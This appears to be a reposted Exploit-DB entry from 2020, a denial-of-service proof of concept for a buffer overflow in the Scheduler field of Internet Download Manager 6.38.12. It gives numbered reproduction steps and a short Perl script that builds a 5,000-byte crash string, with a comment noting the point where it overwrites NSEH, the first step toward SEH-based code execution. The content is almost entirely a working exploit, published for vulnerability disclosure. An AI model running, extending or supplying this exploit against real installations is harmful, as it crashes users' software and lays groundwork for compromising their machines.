Internet Download Manager 6.38.12 – Scheduler Downloads Scheduler Buffer Overflow (PoC)

• Exploit Database
• 21 阅读

• 作者： Vincent Wolterman
  日期： 2020-11-19
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/49083/

• # Exploit Title: Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)
  # Date: November 18, 2020
  # Exploit Author: Vincent Wolterman
  # Vendor Homepage: http://www.internetdownloadmanager.com/
  # Software Link: http://www.internetdownloadmanager.com/download.html
  # Version: 6.38.12
  # Tested on: Windows 7 Professional SP 1 Build 7601; Windows 10 Home Build 19041
  
  # Steps to reproduce crash:
  # 1) Execute provided Perl code
  # 2) Open IDMan_Crash.txt output file
  # 3) Copy contents of text file to clipboard
  # 4) Open Internet Download Manager 6.38
  # 5) From the Menu bar -> Downloads -> Scheduler
  # 6) Check the box for 'Open the following file when done:'
  # 7) Paste the contents of IDMan_Crash.txt into the input field below
  # 8) Click 'Apply' and observe the crash
  
  #!/usr/bin/perl
  
  $baddata = "\x41" x 1302;
  $baddata .= "\x42" x 2; # this length overwrites NSEH on Windows 7 Pro SP 1
  $baddata .= "\x43"x(5000-length($baddata));
  
  $file = "IDMan_Crash.txt";
  open (FILE, '>IDMan_Crash.txt');
  print FILE $baddata;
  close (FILE);
  
  print "Exploit file created [" . $file . "]\n";
  print "Buffer size: " . length($baddata) . "\n";